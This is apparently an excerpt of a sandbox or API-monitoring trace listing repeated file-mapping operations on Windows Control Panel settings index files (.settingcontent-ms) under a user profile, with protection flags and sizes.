Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{10cbe5dd-9921-4090-b412-361339a230ad}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{10cbe5dd-9921-4090-b412-361339a230ad}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1904 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{11135AE0-7372-4f85-8D1B-93D6EFBE5A99}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{11135AE0-7372-4f85-8D1B-93D6EFBE5A99}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1696 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{11E71674-7556-4E27-8D59-03B2FA846204}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{11E71674-7556-4E27-8D59-03B2FA846204}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1824 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{1206f5f1-0569-412c-8fec-3204630dfb70}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{1206f5f1-0569-412c-8fec-3204630dfb70}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1600 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{12BBBD91-8E16-4C3F-9715-16E5C8299244}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{12BBBD91-8E16-4C3F-9715-16E5C8299244}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1936 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{141D98AD-3E07-4C44-A578-4DCA078286A4}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{141D98AD-3E07-4C44-A578-4DCA078286A4}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1792 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{14DEC75C-D6CE-44A9-8349-AD0F46EF96BE}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{14DEC75C-D6CE-44A9-8349-AD0F46EF96BE}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{16C327FA-D8A8-41C0-B022-64AC67715327}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{16C327FA-D8A8-41C0-B022-64AC67715327}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1696 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{17cd9488-1228-4b2f-88ce-4298e93e0966}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{17cd9488-1228-4b2f-88ce-4298e93e0966}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1648 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{1928DA28-C5A7-4F13-AF81-8238D57A793F}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{1928DA28-C5A7-4F13-AF81-8238D57A793F}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2000 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{1a4635ec-181d-45ae-b691-bc75bec02756}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{1a4635ec-181d-45ae-b691-bc75bec02756}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1680 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{1A5712E4-AAD7-4717-B22A-CF0B8438E2E6}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{1A5712E4-AAD7-4717-B22A-CF0B8438E2E6}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1760 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{1BDB99DF-3832-49D6-9AE0-52105DB568DA}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{1BDB99DF-3832-49D6-9AE0-52105DB568DA}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1744 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{1DD03EE3-FC46-456A-8632-B0717A9D497D}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{1DD03EE3-FC46-456A-8632-B0717A9D497D}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{201CEF4B-7444-4B2F-B885-5E8F0AA1D614}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{201CEF4B-7444-4B2F-B885-5E8F0AA1D614}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1984 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{207D6BD2-A09B-406f-8A72-BC90C49FC152}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{207D6BD2-A09B-406f-8A72-BC90C49FC152}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2288 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{21A5437E-D266-4F56-A146-06744A8BC071}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{21A5437E-D266-4F56-A146-06744A8BC071}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1936 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{232A1851-808C-4B44-A92A-38E862989CE5}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{232A1851-808C-4B44-A92A-38E862989CE5}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1952 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{29B87534-19A8-4A39-AA81-2148E7DE5894}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{29B87534-19A8-4A39-AA81-2148E7DE5894}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1984 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{2B6FE85A-C7AA-440F-B9A3-3F5EDCA3F6C2}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{2B6FE85A-C7AA-440F-B9A3-3F5EDCA3F6C2}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1728 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{2D06D17B-2A5F-4835-AF30-6D2D58A4A66C}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{2D06D17B-2A5F-4835-AF30-6D2D58A4A66C}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1760 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{30137454-0E1F-43bb-9CB8-AEF452964B0B}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{30137454-0E1F-43bb-9CB8-AEF452964B0B}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1712 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{31DD3DA1-ED44-4BA8-A67B-6EA93DEA77E7}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{31DD3DA1-ED44-4BA8-A67B-6EA93DEA77E7}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1824 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{33843DB0-24E7-4682-A019-5393D7F2BFFA}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{33843DB0-24E7-4682-A019-5393D7F2BFFA}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1696 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{33F1F9B5-BD94-4D77-96AE-62F10E4A010A}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{33F1F9B5-BD94-4D77-96AE-62F10E4A010A}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1744 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{36C8B34B-83F9-4704-B817-9AB1A723705A}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{36C8B34B-83F9-4704-B817-9AB1A723705A}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1680 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{36fb1658-3a23-4d62-9bfd-37f4b18a85e9}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{36fb1658-3a23-4d62-9bfd-37f4b18a85e9}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1712 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{37092408-D49C-451D-B56D-78B243DC475C}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{37092408-D49C-451D-B56D-78B243DC475C}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1728 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{37C361D8-51CD-40fa-A797-8FC1EA28F9F4}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{37C361D8-51CD-40fa-A797-8FC1EA28F9F4}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1728 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{37E2F32E-C821-4094-B429-2B4E8EA810AA}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{37E2F32E-C821-4094-B429-2B4E8EA810AA}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1808 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{38bd6d6e-bf78-4c31-b05a-7447ee37669f}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{38bd6d6e-bf78-4c31-b05a-7447ee37669f}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1936 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{3911D4F8-AD61-4911-A151-5682C26A7427}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{3911D4F8-AD61-4911-A151-5682C26A7427}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1824 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{3A100872-EC27-46A5-BBCC-92C90635AE3B}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{3A100872-EC27-46A5-BBCC-92C90635AE3B}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1760 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{3A4140C8-50D3-44E9-BF50-C878204DE0F5}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{3A4140C8-50D3-44E9-BF50-C878204DE0F5}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2016 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{3F0AD6DB-3246-48E4-ACD7-696FF62AE68D}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{3F0AD6DB-3246-48E4-ACD7-696FF62AE68D}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1792 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{4026492f-2f69-46b8-b9bf-5654fc07e423}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{4026492f-2f69-46b8-b9bf-5654fc07e423}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{40419485-c444-4567-851a-2dd7bfa1684d}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{40419485-c444-4567-851a-2dd7bfa1684d}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1616 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{420C524A-2A76-43F7-B1B2-C3CF736557C7}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{420C524A-2A76-43F7-B1B2-C3CF736557C7}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1888 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{4228F99D-227F-4058-9EA3-BB2B616D7444}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{4228F99D-227F-4058-9EA3-BB2B616D7444}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1792 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{45FDB5DF-1457-4A41-A824-7AD9C75767BC}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{45FDB5DF-1457-4A41-A824-7AD9C75767BC}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1776 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{4A2F952E-0618-467F-ADC5-FEBB66AEB82F}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{4A2F952E-0618-467F-ADC5-FEBB66AEB82F}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1744 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{4BCD16D0-BA72-4F0D-88F9-50D912BFA2B2}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{4BCD16D0-BA72-4F0D-88F9-50D912BFA2B2}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1888 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{50DF4F13-4188-49C3-B2FB-A76404DC0ACF}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{50DF4F13-4188-49C3-B2FB-A76404DC0ACF}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1760 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{5163E94E-4C07-420B-B173-320232B8AFB7}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{5163E94E-4C07-420B-B173-320232B8AFB7}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1936 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{54692DB7-FC98-4D5E-AC15-CC5095FA5669}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{54692DB7-FC98-4D5E-AC15-CC5095FA5669}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1808 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{54D8069E-E75A-4437-B45B-8EB3B8C97434}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{54D8069E-E75A-4437-B45B-8EB3B8C97434}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1792 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{5530E8CC-1B9E-4798-A880-BA719ADFBBBD}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{5530E8CC-1B9E-4798-A880-BA719ADFBBBD}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1680 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{58e3c745-d971-4081-9034-86e34b30836a}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{58e3c745-d971-4081-9034-86e34b30836a}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{5902614C-D9C7-4902-9F7F-BAF85454D0B2}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{5902614C-D9C7-4902-9F7F-BAF85454D0B2}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1744 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{5A2C0E5E-5974-4E44-B4C6-AD4C2B6BAF53}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{5A2C0E5E-5974-4E44-B4C6-AD4C2B6BAF53}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{5BB16858-F647-465E-BCFD-010EE9DD41B7}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{5BB16858-F647-465E-BCFD-010EE9DD41B7}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1760 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{5D461B44-2753-4DD7-B2C0-BAB71B1F4C1A}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{5D461B44-2753-4DD7-B2C0-BAB71B1F4C1A}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1776 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{5D611F64-7985-459B-BDFF-AEC069CB2625}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{5D611F64-7985-459B-BDFF-AEC069CB2625}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1824 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{5DD91132-02E8-43F6-88BD-E50B7BE2EF29}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{5DD91132-02E8-43F6-88BD-E50B7BE2EF29}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1824 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{5DE5B491-2CEA-4AD9-824A-982A22C0B64E}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{5DE5B491-2CEA-4AD9-824A-982A22C0B64E}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1744 True 1
Fn
